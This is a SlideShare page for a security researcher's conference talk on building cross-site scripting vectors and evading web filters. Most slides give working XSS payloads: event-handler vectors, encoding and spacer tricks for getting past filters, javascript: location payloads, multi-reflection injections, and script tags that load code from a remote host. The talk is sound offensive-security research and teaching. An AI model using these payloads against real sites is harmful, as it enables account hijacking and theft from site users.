Uploaded byRodolfo Assis (Brute)
PDF, PPTX8,366 views

Building Advanced XSS Vectors

The document discusses advanced XSS (Cross-Site Scripting) techniques presented by a security researcher. It covers various methods for building XSS vectors, including agnostic event handlers, reusing native code, filter bypassing, and location-based payloads. The presenter emphasizes the complexity of XSS attacks and the ease of evading security filters.

Embed presentation

Download as PDF, PPTX
Building Advanced XSS Vectors by @brutelogic
About
About - Agenda ● About ● Vector Scheme ● Vector Builder (webGun) ● Agnostic Event Handlers ● Reusing Native Code ● Filter Bypass ● Location Based Payloads ● Multi Reflection
About - Speaker ● Security researcher @sucurisecurity ● Former #1 @openbugbounty ● Some HoF & acknowledgements ● XSS expert
About - Presentation ● Not just another talk on XSS ● Use of alert(1) for didactic purposes ● Mainly about event based XSS ● Some stuff may be hard to follow
Vector Scheme
Vector Scheme ● Regular <tag handler=code> Example: <svg onload=alert(1)>
Vector Scheme ● Full extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3 Example: <table><thead%0Cstyle=font-size:700px%0Donmouseover%0A=%0Bprompt (1)%09><td>AAAAAAAAA
Vector Builder (webGun) http://brutelogic.com.br/webgun
Vector Builder (webGun) ● Interactive cheat sheet ● Builder of XSS vectors/payloads ● More than 3k unique combinations ● Event or tag oriented ● Handlers by browser ● Handlers by length* ● Manual vector editing ● Test on target or default test page * for filter bypass procedure.
Agnostic Event Handlers
Agnostic Event Handlers ● Used with almost any tag ● Ones that work with arbitrary tags Example: <brute ● Most require UI ● Work on all major browsers
Agnostic Event Handlers - List ● onblur ● onclick ● oncopy ● oncontextmenu ● oncut ● ondblclick ● ondrag ● onfocus ● oninput ● onkeydown ● onkeypress ● onkeyup ● onmousedown ● onmousemove ● onmouseout ● onmouseover ● onmouseup ● onpaste
Agnostic Event Handlers ● Example: <brute onclick=alert(1)>clickme!
Reusing Native Code
Reusing Native Code ● Example 1 ...<input type="hidden" value="INPUT"></form><script type="text/javascript"> function x(){ do something }</script> ● INPUT "><script>alert(1)// or "><script>alert(1)<!--
Reusing Native Code ● Injection ...<input type="hidden" value=""><script>alert(1)//"></form><script type=" text/javascript"> function x(){ do something }</script> ● Result ...<input type="hidden" value=""><script>alert(1)//"></form><script type=" text/javascript"> function x(){ do something }</script>
Reusing Native Code ● Example 2 … <input type="hidden" value="INPUT" > </form> <script type="text/javascript"> function x() { do something } </script> ● INPUT "><script src="//brutelogic.com.br/1 or "><script src="//3334957647/1
Reusing Native Code ● Injection … <input type="hidden" value="" ><script src="//brutelogic.com.br/1" > </form> <script type="text/javascript"> function x() { do something } </script> ● Result … <input type="hidden" value="" ><script src="//brutelogic.com.br/1" > </form> <script type="text/javascript"> function x() { do something } </script>
Filter Bypass
Filter Bypass - Procedure ● Arbitrary tag + fake handler ● Start with 5 chars, increase ● Example <x onxxx=1 (5) pass <x onxxxx=1 (6) pass <x onxxxxx=1 (7) block Up to 6 chars: oncut, onblur, oncopy, ondrag, ondrop, onhelp, onload, onplay, onshow
Filter Bypass - Tricks ● Encoding %3Cx onxxx=1 <%78 onxxx=1 <x %6Fnxxx=1 <x o%6Exxx=1 <x on%78xx=1 <x onxxx%3D1 ● Mixed Case <X onxxx=1 <x ONxxx=1 <x OnXxx=1 <X OnXxx=1 ● Doubling <x onxxx=1 onxxx=1
Filter Bypass - Tricks ● Spacers <x/onxxx=1 <x%09onxxx=1 <x%0Aonxxx=1 <x%0Conxxx=1 <x%0Donxxx=1 <x%2Fonxxx=1 ● Combo <x%2F1=">%22OnXxx%3D1 ● Quotes <x 1='1'onxxx=1 <x 1="1"onxxx=1 ● Mimetism <x </onxxx=1 (closing tag) <x 1=">" onxxx=1 (text outside tag) <http://onxxx%3D1/ (URL)
Location Based Payloads
Location Based Payloads ● Really complex payloads can be built ● document.location properties and similar ● Avoiding special chars (at least between = and >) ● Game over to filter
Location Based Payloads - Document Properties ● location.protocol protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● location.hostname, document.domain protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● location.origin protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● location.pathname protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● location.search protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● previousSibling.nodeValue, document.body.textContent* ("Before") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
Location Based Payloads - Document Properties ● tagName, nodeName ("Itself") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● outerHTML ("Itself") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● innerHTML* ("After") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
Location Based Payloads - Document Properties ● textContent, nextSibling.nodeValue*, firstChild.nodeValue, lastChild. nodeValue ("After") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
Location Based Payloads - Document Properties ● Location.hash ("Hash") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Document Properties ● URL, location.href, baseURI, documentURI protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
Location Based Payloads - Evolution 1 <svg onload=location='javascript:alert(1)'> <svg onload=location=location.hash.substr(1)>#javascript:alert(1) <svg onload=location='javas'+'cript:'+'ale'+'rt'+location.hash.substr(1)>#(1) <svg onload=location=/javas/.source+cript:/.source+/ale/.source+/rt/. source+location.hash.substr(1)>#(1) <svg onload=location=/javas/.source+/cript:/.source+/ale/.source+/rt/. source+location.hash[1]+1+location.hash[2]>#()
Location Based Payloads - Evolution 2 <javascript onclick=alert(tagName)>click me! <javascript:alert(1) onclick=location=tagName>click me! <== doesn't work! So... <javascript onclick=location=tagName+location.hash(1)>click me!#:alert(1) <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me! #*/alert(1) javascript + :"click me! + #"-alert(1) javascrip + t:"click me! + #"-alert(1) javas + cript:"click me! + #"-alert(1)
Location Based Payloads - Taxonomy ● By Type 1. Location 2. Location Self 3. Location Self Plus ● By Positioning (Properties) Before < Itself > After # Hash Inside
Location Based Payloads - Location ● Location After (innerHTML) <j onclick=location=innerHTML>javascript&colon;alert(1)// ● Location Inside (name+id) <svg id=t:alert(1) name=javascrip onload=location=name+id>
Location Based Payloads - Location ● Location Itself + After + Hash (tagName+innerHTML+location.hash) <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me! #*/alert(1) <javascript onclick=location=tagName+innerHTML+location.hash>:'click me!#'- alert(1) <javascript onclick=location=tagName+innerHTML+URL>:"-'click me! </javascript>#'-alert(1) Result: javascript + :"-'click me! + http://..."-'click me</javascript>#'-alert(1)
Location Based Payloads - Location ● Location Itself + Hash (tagName+URL) <javascript:"-' onclick=location=tagName+URL>click me!#'-alert(1) (“Labeled Jump”) <javascript: onclick=location=tagName+URL>click me!#%0Aalert(1) Result: javascript: + http://...<javascript: onclick=location=tagName+URL>click me!#% 0Aalert(1)
Location Based Payloads - Location ● Location After + Hash (innerHTML+URL) <j onclick=location=innerHTML+URL>javascript:"-'click me!</j>#'-alert(1) <j onclick=location=innerHTML+URL>javascript:</j>#%0Aalert(1)
Location Based Payloads - Location ● Location Itself + After + Hash (tagName+innerHTML+URL) <javas onclick=location=tagName+innerHTML+URL>cript:"-'click me!</javas>#'- alert(1) <javas onclick=location=tagName+innerHTML+URL>cript:</javas>#%0Aalert(1)
Location Based Payloads - Location ● Location Itself + Before (tagName+previousSibling) "-alert(9)<javascript:" onclick=location=tagName+previousSibling. nodeValue>click me! ● Location Itself + After + Before (tagName+innerHTML+previousSibling) '-alert(9)<javas onclick=location=tagName+innerHTML+previousSibling. nodeValue>cript:'click me!
Location Based Payloads - Location ● Location After + Itself (innerHTML+outerHTML) <alert(1)<!-- onclick=location=innerHTML+outerHTML>javascript:1/*click me! */</alert(1)<!-- --> javascript:1/*click me!*/ + <alert(1)<!-- … </alert(1)<!-- --> <j 1="*/""-alert(1)<!-- onclick=location=innerHTML+outerHTML>javascript: /*click me! javascript:/*click me! + <j 1="*/""-alert(1)<!-- …
Location Based Payloads - Location ● Location After + Before + Itself (innerHTML+previousSibling+outerHTML) */"<j"-alert(9)<!-- onclick=location=innerHTML+previousSibling. nodeValue+outerHTML>javascript:/*click me! javascript:/*click me! + */" + <j"-alert(9)<!-- ... */"<j 1=-alert(9)// onclick=location=innerHTML+previousSibling. nodeValue+outerHTML>javascript:/*click me! javascript:/*click me! + */" + <j 1="-alert(9)//" ...
Location Based Payloads - Location Self ● Location Self Inside p=<svg id=?p=<svg/onload=alert(1)%2B onload=location=id> http://...?p=<svg/onload=alert(1)+ p=<svg id=?p=<script/src=//brutelogic.com.br/1%2B onload=location=id> http://...?p=<script/src=//brutelogic.com.br/1+
Location Based Payloads - Location Self ● Location Self After p=<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)> http://...?p=<svg/onload=alert(1)>
Location Based Payloads - Location Self Plus ● Location Self Plus Itself p=<j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me! http://...?p=%3Cj%26p=%3Csvg%2Bonload=alert(1)%20onclick=location% 2B=outerHTML%3Eclick%20me!<j&p=<svg+onload=alert(1) onclick=" location+=outerHTML">
Location Based Payloads - Location Self Plus ● Location Self Plus After p=<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)> http://...?p=%3Cj%20onclick=location%2B=textContent%3E%26p=%26lt; svg/onload=alert(1)%3E&p=<svg/onload=alert(1)>
Location Based Payloads - Location Self Plus ● Location Self Plus Before p=%26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body. textContent>click me! http://...?p=%26p=%26lt;svg/onload=alert(1)%3E%3Cj%20onclick=location% 2B=document.body.textContent%3Eclick%20me![BODY_CONTENT] &p=<svg/onload=alert(1)>click me!
Multi Reflection
Multi Reflection - Single Input ● Double Reflection - Single Input p='onload=alert(1)><svg/1=' 'onload=alert(1)><svg/1=' … [code] … 'onload=alert(1)><svg/1=' ● Double Reflection - Single Input (script) p=’>alert(1)</script><script/1=’ p=*/alert(1)</script><script>/* */alert(1)</script><script>/* … [code] … */alert(1)</script><script>/*
Multi Reflection - Single Input ● Triple Reflection - Single Input p=*/alert(1)">'onload="/*<svg/1=' p=`-alert(1)">'onload="`<svg/1=' `-alert(1)">'onload="`<svg/1=' … [code] … `-alert(1)">'onload="`<svg/1=' … [code] … `-alert(1)">'onload="`<svg/1=' ● Triple Reflection - Single Input (script) p=*/</script>'>alert(1)/*<script/1=' */</script>'>alert(1)/*<script/1=' … [code] … */</script>'>alert(1)/*<script/1=' … [code] … */</script>'>alert(1)/*<script/1='
Multi Reflection - Multi Input ● 2 inputs: p=<svg/1='&q='onload=alert(1)> ● 3 inputs: p=<svg 1='&q=onload='/*&r=*/alert(1)'>
Conclusion ● XSS vectors can: - be complex; - easily evade filters; - blow your mind.
Thanks! @brutelogic

More Related Content

PDF
XSS Magic tricks
byGarethHeyes
 
PDF
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
byMasato Kinugawa
 
PPTX
Attacking thru HTTP Host header
bySergey Belov
 
PPTX
Waf bypassing Techniques
byAvinash Thapa
 
PDF
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
byFrans Rosén
 
PDF
Neat tricks to bypass CSRF-protection
byMikhail Egorov
 
PPTX
XSS - Do you know EVERYTHING?
byYurii Bilyk
 
PPTX
A Forgotten HTTP Invisibility Cloak
bySoroush Dalili
 
XSS Magic tricks
byGarethHeyes
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
byMasato Kinugawa
 
Attacking thru HTTP Host header
bySergey Belov
 
Waf bypassing Techniques
byAvinash Thapa
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
byFrans Rosén
 
Neat tricks to bypass CSRF-protection
byMikhail Egorov
 
XSS - Do you know EVERYTHING?
byYurii Bilyk
 
A Forgotten HTTP Invisibility Cloak
bySoroush Dalili
 

What's hot

PDF
Polyglot payloads in practice by avlidienbrunn at HackPra
byMathias Karlsson
 
PDF
Frans Rosén Keynote at BSides Ahmedabad
bySecurity BSides Ahmedabad
 
PDF
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
byFrans Rosén
 
PPTX
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
bySoroush Dalili
 
PDF
What should a hacker know about WebDav?
byMikhail Egorov
 
PDF
Bug Bounty Hunter Methodology - Nullcon 2016
bybugcrowd
 
PDF
Offzone | Another waf bypass
byДмитрий Бумов
 
PDF
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
byFrans Rosén
 
PDF
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
byFrans Rosén
 
PPTX
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
bySoroush Dalili
 
PDF
Penetration testing web application web application (in) security
byNahidul Kibria
 
PPTX
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
byCODE BLUE
 
PPTX
Owasp Top 10 A1: Injection
byMichael Hendrickx
 
PPTX
Host Header injection - Slides
byAmit Dubey
 
PPT
Cross Site Request Forgery
byTony Bibbs
 
PDF
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
byMarco Balduzzi
 
PPTX
HTTP HOST header attacks
byDefconRussia
 
PPTX
Dom based xss
byLê Giáp
 
PPTX
OWASP AppSecCali 2015 - Marshalling Pickles
byChristopher Frohoff
 
PPTX
Rest API Security
byStormpath
 
Polyglot payloads in practice by avlidienbrunn at HackPra
byMathias Karlsson
 
Frans Rosén Keynote at BSides Ahmedabad
bySecurity BSides Ahmedabad
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
byFrans Rosén
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
bySoroush Dalili
 
What should a hacker know about WebDav?
byMikhail Egorov
 
Bug Bounty Hunter Methodology - Nullcon 2016
bybugcrowd
 
Offzone | Another waf bypass
byДмитрий Бумов
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
byFrans Rosén
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
byFrans Rosén
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
bySoroush Dalili
 
Penetration testing web application web application (in) security
byNahidul Kibria
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
byCODE BLUE
 
Owasp Top 10 A1: Injection
byMichael Hendrickx
 
Host Header injection - Slides
byAmit Dubey
 
Cross Site Request Forgery
byTony Bibbs
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
byMarco Balduzzi
 
HTTP HOST header attacks
byDefconRussia
 
Dom based xss
byLê Giáp
 
OWASP AppSecCali 2015 - Marshalling Pickles
byChristopher Frohoff
 
Rest API Security
byStormpath
 

Viewers also liked

PDF
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
byMario Heiderich
 
PPT
XSS and CSRF with HTML5
byShreeraj Shah
 
PPTX
File upload vulnerabilities & mitigation
byOnwukike Chinedu. CISA, CEH, COBIT5 LI, CCNP
 
PPTX
JavaScript Static Security Analysis made easy with JSPrime
byNishant Das Patnaik
 
PDF
libinjection: from SQLi to XSS  by Nick Galbreath
byCODE BLUE
 
PDF
주로사용되는 Xss필터와 이를 공격하는 방법
byguestad13b55
 
PDF
New Methods in Automated XSS Detection & Dynamic Exploit Creation
byKen Belva
 
PDF
Owasp AppSecEU 2015 - BeEF Session
byBart Leppens
 
PDF
Apache安装配置mod security
byHuang Toby
 
PDF
The Hidden XSS - Attacking the Desktop & Mobile Platforms
bykosborn
 
PDF
Sucuri Webinar: How to Clean a Hacked Magento Website
bySucuri
 
PDF
Final lfh presentation (3)
by__x86
 
PPT
{{more}} Kibana4
by琛琳 饶
 
PPT
Xss is more than a simple threat
byAvădănei Andrei
 
PPTX
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
byCODE BLUE
 
PPTX
Pengenalan HTML5, Mobile Application, dan Intel XDK
byMuhammad Yusuf
 
PPT
How To Detect Xss
byFerruh Mavituna
 
PDF
How to-catch-a-chameleon-steven seeley-ruxcon-2012
by_mr_me
 
PDF
D2 t2 steven seeley - ghost in the windows 7 allocator
by_mr_me
 
PDF
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
bySucuri
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
byMario Heiderich
 
XSS and CSRF with HTML5
byShreeraj Shah
 
File upload vulnerabilities & mitigation
byOnwukike Chinedu. CISA, CEH, COBIT5 LI, CCNP
 
JavaScript Static Security Analysis made easy with JSPrime
byNishant Das Patnaik
 
libinjection: from SQLi to XSS  by Nick Galbreath
byCODE BLUE
 
주로사용되는 Xss필터와 이를 공격하는 방법
byguestad13b55
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
byKen Belva
 
Owasp AppSecEU 2015 - BeEF Session
byBart Leppens
 
Apache安装配置mod security
byHuang Toby
 
The Hidden XSS - Attacking the Desktop & Mobile Platforms
bykosborn
 
Sucuri Webinar: How to Clean a Hacked Magento Website
bySucuri
 
Final lfh presentation (3)
by__x86
 
{{more}} Kibana4
by琛琳 饶
 
Xss is more than a simple threat
byAvădănei Andrei
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
byCODE BLUE
 
Pengenalan HTML5, Mobile Application, dan Intel XDK
byMuhammad Yusuf
 
How To Detect Xss
byFerruh Mavituna
 
How to-catch-a-chameleon-steven seeley-ruxcon-2012
by_mr_me
 
D2 t2 steven seeley - ghost in the windows 7 allocator
by_mr_me
 
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
bySucuri
 

Similar to Building Advanced XSS Vectors

PDF
Ekoparty 2017 - The Bug Hunter's Methodology
bybugcrowd
 
PPTX
Reflective and Stored XSS- Cross Site Scripting
byInMobi Technology
 
PPT
XSS Primer - Noob to Pro in 1 hour
bysnoopythesecuritydog
 
PPTX
XSS: From alert(1) to crypto mining malware
byOmer Meshar
 
PDF
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
bySam Bowne
 
DOCX
Unit 1 Stored Cross-Site Scripting (XSS)
byChatanBawankar
 
PDF
J query fundamentals
byAttaporn Ninsuwan
 
PDF
ClubHack Magazine issue April 2012
byClubHack
 
KEY
Application Security for Rich Internet Applicationss (Jfokus 2012)
byjohnwilander
 
PPTX
Google I/O 2012 - Protecting your user experience while integrating 3rd party...
byPatrick Meenan
 
PPTX
Cross site scripting
byDilan Warnakulasooriya
 
KEY
Learning How To Use Jquery #3
byTakahiro Yoshimura
 
PDF
Web2.0 with jQuery in English
byLau Bech Lauritzen
 
PDF
"Подход к написанию безопасного клиентского кода на примере React", Иван Елки...
byMoscowJS
 
PDF
mjs
byIvan Elkin
 
PDF
Intro to jquery
byDan Pickett
 
PPTX
Web Hacking Series Part 4
byAditya Kamat
 
PPTX
NullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
byNishant Das Patnaik
 
PDF
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)
byClubHack
 
PPTX
Dom XSS: Encounters of the3rd kind
byBishan Singh
 
Ekoparty 2017 - The Bug Hunter's Methodology
bybugcrowd
 
Reflective and Stored XSS- Cross Site Scripting
byInMobi Technology
 
XSS Primer - Noob to Pro in 1 hour
bysnoopythesecuritydog
 
XSS: From alert(1) to crypto mining malware
byOmer Meshar
 
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
bySam Bowne
 
Unit 1 Stored Cross-Site Scripting (XSS)
byChatanBawankar
 
J query fundamentals
byAttaporn Ninsuwan
 
ClubHack Magazine issue April 2012
byClubHack
 
Application Security for Rich Internet Applicationss (Jfokus 2012)
byjohnwilander
 
Google I/O 2012 - Protecting your user experience while integrating 3rd party...
byPatrick Meenan
 
Cross site scripting
byDilan Warnakulasooriya
 
Learning How To Use Jquery #3
byTakahiro Yoshimura
 
Web2.0 with jQuery in English
byLau Bech Lauritzen
 
"Подход к написанию безопасного клиентского кода на примере React", Иван Елки...
byMoscowJS
 
mjs
byIvan Elkin
 
Intro to jquery
byDan Pickett
 
Web Hacking Series Part 4
byAditya Kamat
 
NullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
byNishant Das Patnaik
 
Dom XSS - Encounters of the 3rd Kind (Bishan Singh Kochher)
byClubHack
 
Dom XSS: Encounters of the3rd kind
byBishan Singh
 

Recently uploaded

PDF
[BDD 2025 - Mobile Development] Crafting Immersive UI with E2E and AGSL Shade...
byWintari Yasmin
 
PDF
[BDD 2025 - Full-Stack Development] The Modern Stack: Building Web & AI Appli...
byWintari Yasmin
 
PDF
[BDD 2025 - Full-Stack Development] Agentic AI Architecture: Redefining Syste...
byWintari Yasmin
 
PDF
Lets Build a Serverless Function with Kiro
byChris Bingham
 
PDF
[DevFest Strasbourg 2025] - NodeJs Can do that !!
bymoassiongbon
 
PDF
Agentic Intro and Hands-on: Build your first Coded Agent
byUiPathCommunity
 
PDF
[BDD 2025 - Full-Stack Development] Digital Accessibility: Why Developers nee...
bywintari3
 
PDF
Transforming Content Operations in the Age of AI
byEnterprise Knowledge
 
PDF
How Much Does It Cost to Build an eCommerce Website in 2025.pdf
byPixlogix Infotech
 
PPTX
The power of Slack and MuleSoft | Bangalore MuleSoft Meetup #60
byshyamraj55
 
PDF
So You Want to Work at Google | DevFest Seattle 2025
byMargaret Maynard-Reid
 
PDF
MuleSoft Meetup: Dreamforce'25 Tour- Vibing With AI & Agents.pdf
byTintu Jacob Shaji
 
PDF
10 Best Automation QA Testing Software Tools in 2025.pdf
byRohitBhandari66
 
PDF
KMWorld - KM & AI Bring Collectivity, Nostalgia, & Selectivity
byJonathan Ralton
 
PDF
Integrating AI with Meaningful Human Collaboration
byCadabra Studio
 
PPTX
Leon Brands - Intro to GPU Occlusion (Graphics Programming Conference 2024)
byleonbrands1998
 
PDF
Crane Accident Prevention Guide: Key OSHA Regulations for Safer Operations
bySharpEagle Technology
 
PDF
"DISC as GPS for team leaders: how to lead a team from storming to performing...
byFwdays
 
PDF
The partnership effect: Libraries and publishers on collaborating and thrivin...
byBookNet Canada
 
PDF
How Much Does It Cost To Build Software
bycollinmishell2
 
[BDD 2025 - Mobile Development] Crafting Immersive UI with E2E and AGSL Shade...
byWintari Yasmin
 
[BDD 2025 - Full-Stack Development] The Modern Stack: Building Web & AI Appli...
byWintari Yasmin
 
[BDD 2025 - Full-Stack Development] Agentic AI Architecture: Redefining Syste...
byWintari Yasmin
 
Lets Build a Serverless Function with Kiro
byChris Bingham
 
[DevFest Strasbourg 2025] - NodeJs Can do that !!
bymoassiongbon
 
Agentic Intro and Hands-on: Build your first Coded Agent
byUiPathCommunity
 
[BDD 2025 - Full-Stack Development] Digital Accessibility: Why Developers nee...
bywintari3
 
Transforming Content Operations in the Age of AI
byEnterprise Knowledge
 
How Much Does It Cost to Build an eCommerce Website in 2025.pdf
byPixlogix Infotech
 
The power of Slack and MuleSoft | Bangalore MuleSoft Meetup #60
byshyamraj55
 
So You Want to Work at Google | DevFest Seattle 2025
byMargaret Maynard-Reid
 
MuleSoft Meetup: Dreamforce'25 Tour- Vibing With AI & Agents.pdf
byTintu Jacob Shaji
 
10 Best Automation QA Testing Software Tools in 2025.pdf
byRohitBhandari66
 
KMWorld - KM & AI Bring Collectivity, Nostalgia, & Selectivity
byJonathan Ralton
 
Integrating AI with Meaningful Human Collaboration
byCadabra Studio
 
Leon Brands - Intro to GPU Occlusion (Graphics Programming Conference 2024)
byleonbrands1998
 
Crane Accident Prevention Guide: Key OSHA Regulations for Safer Operations
bySharpEagle Technology
 
"DISC as GPS for team leaders: how to lead a team from storming to performing...
byFwdays
 
The partnership effect: Libraries and publishers on collaborating and thrivin...
byBookNet Canada
 
How Much Does It Cost To Build Software
bycollinmishell2
 

Building Advanced XSS Vectors

  • 1.
  • 2.
  • 3.
    About - Agenda ●About ● Vector Scheme ● Vector Builder (webGun) ● Agnostic Event Handlers ● Reusing Native Code ● Filter Bypass ● Location Based Payloads ● Multi Reflection
  • 4.
    About - Speaker ●Security researcher @sucurisecurity ● Former #1 @openbugbounty ● Some HoF & acknowledgements ● XSS expert
  • 5.
    About - Presentation ●Not just another talk on XSS ● Use of alert(1) for didactic purposes ● Mainly about event based XSS ● Some stuff may be hard to follow
  • 6.
  • 7.
    Vector Scheme ● Regular <taghandler=code> Example: <svg onload=alert(1)>
  • 8.
    Vector Scheme ● Full extra1<tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3 Example: <table><thead%0Cstyle=font-size:700px%0Donmouseover%0A=%0Bprompt (1)%09><td>AAAAAAAAA
  • 9.
  • 10.
    Vector Builder (webGun) ●Interactive cheat sheet ● Builder of XSS vectors/payloads ● More than 3k unique combinations ● Event or tag oriented ● Handlers by browser ● Handlers by length* ● Manual vector editing ● Test on target or default test page * for filter bypass procedure.
  • 13.
  • 14.
    Agnostic Event Handlers ●Used with almost any tag ● Ones that work with arbitrary tags Example: <brute ● Most require UI ● Work on all major browsers
  • 15.
    Agnostic Event Handlers- List ● onblur ● onclick ● oncopy ● oncontextmenu ● oncut ● ondblclick ● ondrag ● onfocus ● oninput ● onkeydown ● onkeypress ● onkeyup ● onmousedown ● onmousemove ● onmouseout ● onmouseover ● onmouseup ● onpaste
  • 16.
    Agnostic Event Handlers ●Example: <brute onclick=alert(1)>clickme!
  • 17.
  • 18.
    Reusing Native Code ●Example 1 ...<input type="hidden" value="INPUT"></form><script type="text/javascript"> function x(){ do something }</script> ● INPUT "><script>alert(1)// or "><script>alert(1)<!--
  • 19.
    Reusing Native Code ●Injection ...<input type="hidden" value=""><script>alert(1)//"></form><script type=" text/javascript"> function x(){ do something }</script> ● Result ...<input type="hidden" value=""><script>alert(1)//"></form><script type=" text/javascript"> function x(){ do something }</script>
  • 20.
    Reusing Native Code ●Example 2 … <input type="hidden" value="INPUT" > </form> <script type="text/javascript"> function x() { do something } </script> ● INPUT "><script src="//brutelogic.com.br/1 or "><script src="//3334957647/1
  • 21.
    Reusing Native Code ●Injection … <input type="hidden" value="" ><script src="//brutelogic.com.br/1" > </form> <script type="text/javascript"> function x() { do something } </script> ● Result … <input type="hidden" value="" ><script src="//brutelogic.com.br/1" > </form> <script type="text/javascript"> function x() { do something } </script>
  • 22.
  • 23.
    Filter Bypass -Procedure ● Arbitrary tag + fake handler ● Start with 5 chars, increase ● Example <x onxxx=1 (5) pass <x onxxxx=1 (6) pass <x onxxxxx=1 (7) block Up to 6 chars: oncut, onblur, oncopy, ondrag, ondrop, onhelp, onload, onplay, onshow
  • 24.
    Filter Bypass -Tricks ● Encoding %3Cx onxxx=1 <%78 onxxx=1 <x %6Fnxxx=1 <x o%6Exxx=1 <x on%78xx=1 <x onxxx%3D1 ● Mixed Case <X onxxx=1 <x ONxxx=1 <x OnXxx=1 <X OnXxx=1 ● Doubling <x onxxx=1 onxxx=1
  • 25.
    Filter Bypass -Tricks ● Spacers <x/onxxx=1 <x%09onxxx=1 <x%0Aonxxx=1 <x%0Conxxx=1 <x%0Donxxx=1 <x%2Fonxxx=1 ● Combo <x%2F1=">%22OnXxx%3D1 ● Quotes <x 1='1'onxxx=1 <x 1="1"onxxx=1 ● Mimetism <x </onxxx=1 (closing tag) <x 1=">" onxxx=1 (text outside tag) <http://onxxx%3D1/ (URL)
  • 26.
  • 27.
    Location Based Payloads ●Really complex payloads can be built ● document.location properties and similar ● Avoiding special chars (at least between = and >) ● Game over to filter
  • 28.
    Location Based Payloads- Document Properties ● location.protocol protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 29.
    Location Based Payloads- Document Properties ● location.hostname, document.domain protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 30.
    Location Based Payloads- Document Properties ● location.origin protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 31.
    Location Based Payloads- Document Properties ● location.pathname protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 32.
    Location Based Payloads- Document Properties ● location.search protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 33.
    Location Based Payloads- Document Properties ● previousSibling.nodeValue, document.body.textContent* ("Before") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
  • 34.
    Location Based Payloads- Document Properties ● tagName, nodeName ("Itself") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 35.
    Location Based Payloads- Document Properties ● outerHTML ("Itself") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 36.
    Location Based Payloads- Document Properties ● innerHTML* ("After") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
  • 37.
    Location Based Payloads- Document Properties ● textContent, nextSibling.nodeValue*, firstChild.nodeValue, lastChild. nodeValue ("After") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
  • 38.
    Location Based Payloads- Document Properties ● Location.hash ("Hash") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 39.
    Location Based Payloads- Document Properties ● URL, location.href, baseURI, documentURI protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 40.
